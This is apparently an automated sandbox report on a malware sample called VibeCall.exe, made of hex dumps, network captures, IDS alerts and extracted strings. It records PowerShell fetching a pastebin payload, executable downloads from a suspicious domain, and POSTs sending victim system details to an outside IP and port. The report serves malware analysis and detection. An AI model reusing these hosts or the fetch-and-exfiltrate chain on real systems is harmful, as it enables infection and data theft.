04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 46 58 32 cc 02 39 5c 9f 02 39 5c 9f 02 39 5c 9f 70 b8 5f 9e 1e 39 5c 9f 70 b8 59 9e ae 39 5c 9f 70 b8 58 9e 1b 39 5c 9f 13 bf 5f 9e 14 39 5c 9f 13 bf 58 9e 13 39 5c 9f 13 bf 59 9e 50 39 5c 9f 70 b8 5d 9e 01 39 5c 9f 02 39 5d 9f 7e 39 5c 9f 86 bf 59 9e 01 39 5c 9f 86 bf 5e 9e 03 39 5c 9f 52 69 63 68 02 39 5c 9f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 6f 5b be 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 2a 00 58 02 00 00 d6 57 00 00 00 00 00 b6 72 00 00 00 10 00 00 00 70 02 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$FX29\9\9\p_9\pY9\pX9\_9\X9\YP9\p]9\9]~9\Y9\^9\Rich9\PELo[g*XWrp@
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 02 Mar 2025 21:13:31 GMTContent-Type: application/octet-streamContent-Length: 17066346Connection: keep-aliveLast-Modified: Fri, 28 Feb 2025 15:41:38 GMTETag: "67c1d932-104696a"Cache-Control: max-age=14400CF-Cache-Status: HITAge: 754Accept-Ranges: bytesReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BUZPI0Iv9DECbhYsGvPtKL8StbD%2Fxv651cOt1RzAYnC6sJOMnr3XQn%2BUA68ECHfX3qToPUfel9TyJnDaMOpDfUNnWZFGHE72KfCDRxN0WyKDHIaV0Z2U6nOo2%2FBYMM3pIHD1cABcWge3NU4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91a3e6020b494297-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1761&min_rtt=1761&rtt_var=880&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=88&delivery_rate=0&cwnd=196&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d7 3d 7c e6 93 5c 12 b5 93 5c 12 b5 93 5c 12 b5 87 37 16 b4 9f 5c 12 b5 87 37 17 b4 94 5c 12 b5 87 37 11 b4 96 5c 12 b5 0d fc d5 b5 81 5c 12 b5 4a 21 13 b4 91 5c 12 b5 4a 21 17 b4 b0 5c 12 b5 4a 21 16 b4 92 5c 12 b5 82 da 11 b4 9e 5c 12 b5 82 da 16 b4 98 5c 12 b5 82 da 17 b4 da 5c 12 b5 e1 dd 13 b4 90 5c 12 b5 93 5c 13 b5 21 5c 12 b5 17 da 17 b4 90 5c 12 b5 17 da 10 b4 92 5c 12 b5 52 69 63 68 93 5c 12 b5 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 83 35 bc 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 2a 00 da 01 00 00 46 52 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$=|\\\7\7\7\\J!\J!\J!\\\\\\!\\\Rich\PEL5g*FR
                      Source: global trafficHTTP traffic detected: GET /downloads/aisolution_vibecall_a.exe HTTP/1.1Host: rustaisolutionnorisk.com
                      Source: global trafficHTTP traffic detected: GET /downloads/contry_solution_vibecall_e.exe HTTP/1.1Host: rustaisolutionnorisk.com
                      Source: global trafficHTTP traffic detected: GET /downloads/soundsolution_vibecall_c.exe HTTP/1.1Host: rustaisolutionnorisk.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                      Source: global trafficHTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1Host: ip-api.com
                      Source: global trafficHTTP traffic detected: GET /downloads/videosolution_vibecall_b.exe HTTP/1.1Host: rustaisolutionnorisk.com
                      Source: global trafficHTTP traffic detected: POST /send HTTP/1.1Host: 147.45.60.20:5000Content-Type: application/json; charset=utf-8Content-Length: 1101Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 22 5c 75 32 37 30 35 20 31 20 5c 75 30 34 31 31 5c 75 30 34 33 38 5c 75 30 34 33 42 5c 75 30 34 33 34 20 5c 75 30 34 33 37 5c 75 30 34 33 30 5c 75 30 34 33 46 5c 75 30 34 34 33 5c 75 30 34 34 39 5c 75 30 34 33 35 5c 75 30 34 33 44 20 5c 75 32 37 30 35 5c 6e 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 5c 6e 5c 75 44 38 33 44 5c 75 44 44 33 30 20 5c 75 30 34 31 42 5c 75 30 34 33 30 5c 75 30 34 34 33 5c 75 30 34 33 44 5c 75 30 34 34 37 5c 75 30 34 33 35 5c 75 30 34 34 30 3a 20 56 69 62 65 43 61 6c 6c 20 5c 6e 20 5c 75 44 38 33 44 5c 75 44 45 38 30 20 5c 75 30 34 31 37 5c 75 30 34 33 30 5c 75 30 34 33 46 5c 75 30 34 34 33 5c 75 30 34 34 31 5c 75 30 34 33 41 3a 20 5c 75 30 34 32 33 5c 75 30 34 33 34 5c 75 30 34 33 30 5c 75 30 34 34 37 5c 75 30 34 33 44 5c 75 30 34 34 42 5c 75 30 34 33 39 20 5c 6e 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 5c 6e 5c 75 44 38 33 44 5c 75 44 44 31 37 20 5c 75 30 34 31 30 5c 75 30 34 33 39 5c 75 30 34 33 46 5c 75 30 34 33 38 3a 20 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 20 5c 6e 5c 75 44 38 33 43 5c 75 44 46 30 45 20 5c 75 30 34 32 31 5c 75 30 34 34 32 5c 75 30 34 34 30 5c 75 30 34 33 30 5c 75 30 34 33 44 5c 75 30 34 33 30 3a 20 20 55 6e 69 74 65 64 20 53 74 61 74 65 73 20 5c 6e 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 5c 6e 5c 75 44 38 33 44 5c 75 44 44 32 30 20 5c 75 30 34 32 46 5c 75 30 34 33 37 5c 75 30 34 34 42 5c 75 30 34 33 41 3a 20 45 6e 67 6c 69 73 68 20 28 53 77 69 74 7a 65 72 6c 61 6e 64 29 20 5c 6e 5c 75 44 38 33 44 5c 75 44 43 36 34 20 5c 75 30 34 31 38 5c 75 30 34 33 43 5c 75 30 34 34 46 20 5c 75 30 34 33 46 5c 75 30 34 33 45 5c 75 30 34 33 42 5c 75 30 34 34 43 5c 75 30 34 33 37 5c 75 30 34 33 45 5c 75 30 34 33 32 5c 75 30 34 33 30 5c 75 30 34 34 32 5c 75 30 34 33 35 5c 75 30 34 33 42 5c 75 30 34 34 46 3a 20 6a 6f 6e 65 73 20 28 33 37 36 34 38 33 29 20 5c 6e 5c 75 44 38 33 44 5c 75 44 44 41 35 20 5c 75 30 34 32 31 5c 75 30 34 33 38 5c 75 30 34 34 31 5c 75 30 34 34 32 5c 75 30 34 33 35 5c 75 30 34 33 43 5c 75 30 34 33 30 3a 20 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 5c 75 44 38 33 43 5c 75 44 46 41 45 20 5c 75 30 34 31 32 5c 75 30 34 33 38 5c 75 30 34 33 34 5c 75 30 34 33 35 5c 75 30 34 33 45 5c 75 30 34 33 41 5c 75 30 34 33 30 5c 75 30 34 34 30 5c 75 30 34 34 32 5c 75 30 34 33 30 3a 20 48 45 35 50 32 59 20 5c 6e 5c 75 32 36 39 39 5c 75 46 45 30 46 20 5c 75 30 34 31 46 5c 75 30 34 34 30 5c 75 30 34 33 45 5c 75 30 34 34 36 5c 75 30 34 33 35 5c 75 30 34 34 31 5c 75 30 34 34 31 5c 75 30 34 33 45 5c 75 30 34 34 30 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 3
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                      Source: global trafficHTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1Host: ip-api.com
                      Source: global trafficHTTP traffic detected: POST /send HTTP/1.1Host: 147.45.60.20:5000Content-Type: application/json; charset=utf-8Content-Length: 1101Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 22 5c 75 32 37 30 35 20 32 20 5c 75 30 34 31 31 5c 75 30 34 33 38 5c 75 30 34 33 42 5c 75 30 34 33 34 20 5c 75 30 34 33 37 5c 75 30 34 33 30 5c 75 30 34 33 46 5c 75 30 34 34 33 5c 75 30 34 34 39 5c 75 30 34 33 35 5c 75 30 34 33 44 20 5c 75 32 37 30 35 5c 6e 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 5c 6e 5c 75 44 38 33 44 5c 75 44 44 33 30 20 5c 75 30 34 31 42 5c 75 30 34 33 30 5c 75 30 34 34 33 5c 75 30 34 33 44 5c 75 30 34 34 37 5c 75 30 34 33 35 5c 75 30 34 34 30 3a 20 56 69 62 65 43 61 6c 6c 20 5c 6e 20 5c 75 44 38 33 44 5c 75 44 45 38 30 20 5c 75 30 34 31 37 5c 75 30 34 33 30 5c 75 30 34 33 46 5c 75 30 34 34 33 5c 75 30 34 34 31 5c 75 30 34 33 41 3a 20 5c 75 30 34 32 33 5c 75 30 34 33 34 5c 75 30 34 33 30 5c 75 30 34 34 37 5c 75 30 34 33 44 5c 75 30 34 34 42 5c 75 30 34 33 39 20 5c 6e 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 5c 6e 5c 75 44 38 33 44 5c 75 44 44 31 37 20 5c 75 30 34 31 30 5c 75 30 34 33 39 5c 75 30 34 33 46 5c 75 30 34 33 38 3a 20 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 20 5c 6e 5c 75 44 38 33 43 5c 75 44 46 30 45 20 5c 75 30 34 32 31 5c 75 30 34 34 32 5c 75 30 34 34 30 5c 75 30 34 33 30 5c 75 30 34 33 44 5c 75 30 34 33 30 3a 20 20 55 6e 69 74 65 64 20 53 74 61 74 65 73 20 5c 6e 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 5c 6e 5c 75 44 38 33 44 5c 75 44 44 32 30 20 5c 75 30 34 32 46 5c 75 30 34 33 37 5c 75 30 34 34 42 5c 75 30 34 33 41 3a 20 45 6e 67 6c 69 73 68 20 28 53 77 69 74 7a 65 72 6c 61 6e 64 29 20 5c 6e 5c 75 44 38 33 44 5c 75 44 43 36 34 20 5c 75 30 34 31 38 5c 75 30 34 33 43 5c 75 30 34 34 46 20 5c 75 30 34 33 46 5c 75 30 34 33 45 5c 75 30 34 33 42 5c 75 30 34 34 43 5c 75 30 34 33 37 5c 75 30 34 33 45 5c 75 30 34 33 32 5c 75 30 34 33 30 5c 75 30 34 34 32 5c 75 30 34 33 35 5c 75 30 34 33 42 5c 75 30 34 34 46 3a 20 6a 6f 6e 65 73 20 28 33 37 36 34 38 33 29 20 5c 6e 5c 75 44 38 33 44 5c 75 44 44 41 35 20 5c 75 30 34 32 31 5c 75 30 34 33 38 5c 75 30 34 34 31 5c 75 30 34 34 32 5c 75 30 34 33 35 5c 75 30 34 33 43 5c 75 30 34 33 30 3a 20 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 5c 75 44 38 33 43 5c 75 44 46 41 45 20 5c 75 30 34 31 32 5c 75 30 34 33 38 5c 75 30 34 33 34 5c 75 30 34 33 35 5c 75 30 34 33 45 5c 75 30 34 33 41 5c 75 30 34 33 30 5c 75 30 34 34 30 5c 75 30 34 34 32 5c 75 30 34 33 30 3a 20 48 45 35 50 32 59 20 5c 6e 5c 75 32 36 39 39 5c 75 46 45 30 46 20 5c 75 30 34 31 46 5c 75 30 34 34 30 5c 75 30 34 33 45 5c 75 30 34 34 36 5c 75 30 34 33 35 5c 75 30 34 34 31 5c 75 30 34 34 31 5c 75 30 34 33 45 5c 75 30 34 34 30 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 3
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                      Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                      Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
                      Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: unknownDNS query: name: api.ipify.org
                      Source: unknownDNS query: name: api.ipify.org
                      Source: unknownDNS query: name: ip-api.com
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49742 -> 188.114.97.3:80
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49743 -> 188.114.97.3:80
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49745 -> 188.114.97.3:80
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49747 -> 104.26.12.205:80
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49748 -> 208.95.112.1:80
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49750 -> 188.114.97.3:80
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49778 -> 104.26.12.205:80
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49803 -> 104.26.12.205:80
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49860 -> 104.26.12.205:80
                      Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49740 -> 104.20.4.235:443
                      Source: global trafficHTTP traffic detected: GET /raw/QE03kE1s HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /dns-query HTTP/1.1Host: cloudflare-dns.comAccept: application/dns-messageHost: cloudflare-dns.comUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:108.0) Gecko/20100101 Firefox/108.0Content-Length: 38Content-Type: application/dns-message
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.60.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.60.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.60.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.60.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.60.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.60.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.60.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.60.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.60.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.60.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.60.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.60.20
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 32_2_0516B654 WSARecv,WSAGetLastError,32_2_0516B654
                      Source: global trafficHTTP traffic detected: GET /raw/QE03kE1s HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /downloads/aisolution_vibecall_a.exe HTTP/1.1Host: rustaisolutionnorisk.com
                      Source: global trafficHTTP traffic detected: GET /downloads/contry_solution_vibecall_e.exe HTTP/1.1Host: rustaisolutionnorisk.com
                      Source: global trafficHTTP traffic detected: GET /downloads/soundsolution_vibecall_c.exe HTTP/1.1Host: rustaisolutionnorisk.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                      Source: global trafficHTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1Host: ip-api.com
                      Source: global trafficHTTP traffic detected: GET /downloads/videosolution_vibecall_b.exe HTTP/1.1Host: rustaisolutionnorisk.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                      Source: global trafficHTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1Host: ip-api.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                      Source: global trafficDNS traffic detected: DNS query: pastebin.com
                      Source: global trafficDNS traffic detected: DNS query: rustaisolutionnorisk.com
                      Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                      Source: global trafficDNS traffic detected: DNS query: ip-api.com
                      Source: global trafficDNS traffic detected: DNS query: api.mirrow1-dell.xyz
                      Source: unknownDoH DNS queries detected: name: api.mirrow1-dell.xyz
                      Source: unknownHTTP traffic detected: POST /dns-query HTTP/1.1Host: cloudflare-dns.comAccept: application/dns-messageHost: cloudflare-dns.comUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:108.0) Gecko/20100101 Firefox/108.0Content-Length: 38Content-Type: application/dns-message
                      Source: VibeCall.exe, 00000000.00000000.1748740065.00007FF7C2A0D000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://.css
                      Source: VibeCall.exe, 00000000.00000000.1748740065.00007FF7C2A0D000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://.jpg
                      Source: powershell.exe, 00000004.00000002.2022396979.000002DA1B103000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                      Source: powershell.exe, 00000002.00000002.1961097242.00000247A6020000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microssP
                      Source: VibeCall.exe, 00000000.00000003.1758017545.0000026605CCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://en.w
                      Source: VibeCall.exe, 00000000.00000000.1748740065.00007FF7C2A0D000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://html4/loose.dtd
                      Source: powershell.exe, 00000002.00000002.1945918714.000002479DCC3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2012989299.000002DA12B84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1937182388.000002DA043EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2012989299.000002DA12CC6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2265791475.0000021C94292000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: powershell.exe, 00000004.00000002.1937182388.000002DA040E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com
                      Source: powershell.exe, 0000000C.00000002.2151202580.0000021C84448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: powershell.exe, 00000002.00000002.1919040812.000002478DE78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2151202580.0000021C84448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                      Source: powershell.exe, 00000002.00000002.1919040812.000002478DC51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1937182388.000002DA02B11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2151202580.0000021C84221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 00000002.00000002.1919040812.000002478DE78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2151202580.0000021C84448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                      Source: VibeCall.exe, 00000000.00000003.1772397607.0000026605CCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                      Source: powershell.exe, 0000000C.00000002.2151202580.0000021C84448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: VibeCall.exe, 00000000.00000003.1789784524.0000026605CC4000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.1789090532.0000026605CC3000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.1790572970.0000026605CC3000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.1788891194.0000026605CC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                      Source: powershell.exe, 0000000C.00000002.2298663459.0000021C9CB36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.c
                      Source: VibeCall.exe, 00000000.00000003.1755495385.0000026605CD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                      Source: VibeCall.exe, 00000000.00000003.1771565207.0000026605CCD000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.1771498459.0000026605CF8000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.1771537561.0000026605CF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                      Source: VibeCall.exe, 00000000.00000003.1771756180.0000026605CCD000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.1771808124.0000026605CD7000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.1771679654.0000026605CCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.comdd
                      Source: fontdrvhost.exeString found in binary or memory: https://171.22.120.233:4955/6519b3d55998bf5e49d571/9uhjmqat.jd8rm
                      Source: VibeCall.exe, 00000000.00000000.1748740065.00007FF7C2A0D000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/dotnet-core-applaunch?
                      Source: VibeCall.exe, 00000000.00000000.1748740065.00007FF7C2A0D000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/dotnet-core-applaunch?Description:
                      Source: VibeCall.exe, 00000000.00000000.1748740065.00007FF7C2A0D000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/dotnet/app-launch-failed
                      Source: VibeCall.exe, 00000000.00000000.1748740065.00007FF7C2A0D000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/dotnet/download%s%sInstall
                      Source: VibeCall.exe, 00000000.00000000.1748740065.00007FF7C2A0D000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/dotnet/downloadCommon
                      Source: VibeCall.exe, 00000000.00000000.1748740065.00007FF7C2A0D000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/dotnet/info
                      Source: VibeCall.exe, 00000000.00000000.1748740065.00007FF7C2A0D000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/dotnet/sdk-not-found
                      Source: powershell.exe, 00000002.00000002.1919040812.000002478DC51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1937182388.000002DA02B11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2151202580.0000021C84221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                      Source: fontdrvhost.exeString found in binary or memory: https://cloudflare-dns.com/dns-query
                      Source: powershell.exe, 0000000C.00000002.2265791475.0000021C94292000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 0000000C.00000002.2265791475.0000021C94292000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 0000000C.00000002.2265791475.0000021C94292000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: VibeCall.exe, 00000000.00000003.1756374560.0000026605CD0000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.1756789919.0000026605CD0000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.1756530485.0000026605CD0000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.1757250069.0000026605CCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.mic
                      Source: powershell.exe, 0000000C.00000002.2151202580.0000021C84448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: powershell.exe, 00000004.00000002.1937182388.000002DA03C6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                      Source: powershell.exe, 00000002.00000002.1945918714.000002479DCC3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2012989299.000002DA12B84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1937182388.000002DA043EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2012989299.000002DA12CC6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2265791475.0000021C94292000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: powershell.exe, 00000004.00000002.1937182388.000002DA03C6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
                      Source: powershell.exe, 00000004.00000002.2019685571.000002DA1AE50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/QE03kE1s
                      Source: powershell.exe, 00000004.00000002.2019685571.000002DA1AEDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/QE03kE1sA
                      Source: powershell.exe, 00000004.00000002.1935462394.000002DA00F70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/qe03ke1s
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                      Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.4:49740 version: TLS 1.2
                      Source: aisolution_vibecall_a.exe, 0000000F.00000003.2563032067.0000000003980000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DirectInput8Creatememstr_b173d90d-8
                      Source: aisolution_vibecall_a.exe, 0000000F.00000003.2563032067.0000000003980000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: GetRawInputDatamemstr_ae4dcbb1-9
                      Source: Yara matchFile source: 26.3.fontdrvhost.exe.5610000.7.raw.unpack, type: UNPACKEDPE
